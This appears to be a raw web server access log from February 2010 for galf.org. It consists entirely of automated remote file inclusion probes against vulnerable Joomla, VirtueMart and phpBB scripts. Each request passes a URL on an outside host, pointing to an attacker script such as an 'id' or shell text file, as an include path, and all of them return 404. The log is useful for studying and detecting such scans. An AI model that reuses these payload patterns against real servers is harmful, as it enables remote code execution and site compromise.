189.108.236.148 - - [01/Feb/2010:02:43:27 -0800] "GET /logs/access.log/common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.108.236.148 - - [01/Feb/2010:02:43:27 -0800] "GET /common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.108.236.148 - - [01/Feb/2010:02:43:27 -0800] "GET /logs/common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [01/Feb/2010:02:44:04 -0800] "GET /components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
84.19.168.8 - - [01/Feb/2010:02:44:10 -0800] "GET /logs//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:44:16 -0800] "GET //modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:44:16 -0800] "GET /logs/access_091102.log///modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:44:16 -0800] "GET /logs///modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [01/Feb/2010:02:45:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:45:33 -0800] "GET /logs///modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:45:34 -0800] "GET //modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:45:34 -0800] "GET /logs/access_091026.log///modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [01/Feb/2010:02:45:37 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:45:37 -0800] "GET /logs/access_090914.log///modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:46:00 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:46:01 -0800] "GET /logs/access_091005.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:46:02 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.3.83.14 - - [01/Feb/2010:02:46:07 -0800] "GET /logs//admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.3.83.14 - - [01/Feb/2010:02:46:07 -0800] "GET /admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.3.83.14 - - [01/Feb/2010:02:46:07 -0800] "GET /logs/access.log//admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:46:09 -0800] "GET /logs/access_091005.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:46:10 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:46:10 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:46:21 -0800] "GET /logs/access_091005.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:46:21 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:46:21 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:46:29 -0800] "GET /logs/access_090921.log/common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:46:29 -0800] "GET /common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:46:29 -0800] "GET /logs/common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [01/Feb/2010:02:46:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
212.3.83.14 - - [01/Feb/2010:02:47:02 -0800] "GET /logs/access.log%20%20//admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:48:36 -0800] "GET /logs/access_091005.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:48:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:48:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:02:48:50 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:02:48:50 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:02:48:51 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:02:48:51 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:02:48:57 -0800] "GET /logs/access_091005.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:02:48:59 -0800] "GET /logs/access_091005.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:49:34 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:49:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:49:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:49:43 -0800] "GET ///includes/functions_mod_user.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:49:43 -0800] "GET /logs/access_091102.log////includes/functions_mod_user.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:49:43 -0800] "GET /logs////includes/functions_mod_user.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:49:46 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:49:46 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:49:49 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:49:50 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:49:54 -0800] "GET /logs/Bisexual//board/bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:49:54 -0800] "GET /Bisexual//board/bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:49:54 -0800] "GET /logs/access_090720.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:02:50:01 -0800] "GET /logs/access_090720.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:02:50:02 -0800] "GET /logs/access_090720.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:50:06 -0800] "GET /Bisexual//board/bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:50:06 -0800] "GET /logs/Bisexual//board/bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:50:06 -0800] "GET /Bisexual//board/bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:50:07 -0800] "GET /logs/Bisexual//board/bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:50:07 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:50:07 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:50:10 -0800] "GET /logs/access_090720.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:50:22 -0800] "GET /logs/access.log%20%20/Bisexual//board/bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:50:31 -0800] "GET /logs/access_091005.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:50:32 -0800] "GET /logs/access.log%20%20/Bisexual//board/bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:50:32 -0800] "GET /logs/access.log%20%20/Bisexual//board/bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:50:43 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:50:43 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:50:47 -0800] "GET /logs////includes/functions_mod_user.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:50:47 -0800] "GET /logs/access_091026.log////includes/functions_mod_user.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:50:47 -0800] "GET ///includes/functions_mod_user.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:50:51 -0800] "GET /logs/access_090914.log////includes/functions_mod_user.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:50:54 -0800] "GET /logs/access_090727.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:50:59 -0800] "GET /logs/access_091005.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:51:16 -0800] "GET /logs/access_090720.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:02:51:27 -0800] "GET /logs/access_090720.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:51:33 -0800] "GET /logs/access_090727.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:51:55 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
203.251.80.167 - - [01/Feb/2010:02:51:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
125.141.91.138 - - [01/Feb/2010:02:52:01 -0800] "GET /logs/access_090720.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:52:22 -0800] "GET /logs/access_100125.log%20%20/Bisexual//board/bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [01/Feb/2010:02:52:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:52:35 -0800] "GET /logs/access_100125.log%20%20/Bisexual//board/bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:52:38 -0800] "GET /logs/access_100125.log%20%20/Bisexual//board/bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.207.177.222 - - [01/Feb/2010:02:52:39 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.207.177.222 - - [01/Feb/2010:02:52:39 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.207.177.222 - - [01/Feb/2010:02:52:39 -0800] "GET /logs/access_090907.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:53:32 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
203.251.80.167 - - [01/Feb/2010:02:53:32 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
69.13.69.245 - - [01/Feb/2010:02:54:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
84.19.168.8 - - [01/Feb/2010:02:55:17 -0800] "GET /logs/access_091026.log//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [01/Feb/2010:02:55:17 -0800] "GET /components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [01/Feb/2010:02:55:17 -0800] "GET /logs//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.207.177.222 - - [01/Feb/2010:02:56:42 -0800] "GET /logs/access_090921.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [01/Feb/2010:02:56:44 -0800] "GET /logs/access_091026.log%20%20//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [01/Feb/2010:02:56:44 -0800] "GET /logs//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [01/Feb/2010:02:56:44 -0800] "GET /components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [01/Feb/2010:02:59:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
69.13.69.245 - - [01/Feb/2010:02:59:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
69.13.69.245 - - [01/Feb/2010:02:59:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "galf.org"
69.13.69.245 - - [01/Feb/2010:02:59:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "galf.org"
75.126.213.58 - - [01/Feb/2010:02:59:38 -0800] "GET /logs/access_091102.log///toplist.php?f=toplist_top10&phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:59:39 -0800] "GET //toplist.php?f=toplist_top10&phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:59:40 -0800] "GET /logs///toplist.php?f=toplist_top10&phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:03:00:33 -0800] "GET /logs/access_091026.log///toplist.php?f=toplist_top10&phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:03:00:33 -0800] "GET //toplist.php?f=toplist_top10&phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:03:00:33 -0800] "GET /logs///toplist.php?f=toplist_top10&phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:03:00:36 -0800] "GET /logs/access_090914.log///toplist.php?f=toplist_top10&phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.186.191.218 - - [01/Feb/2010:03:02:17 -0800] "GET /logs/access_091026.log%20%20///modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://ricajupanu.go.ro/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.186.191.218 - - [01/Feb/2010:03:02:17 -0800] "GET /logs///modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://ricajupanu.go.ro/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
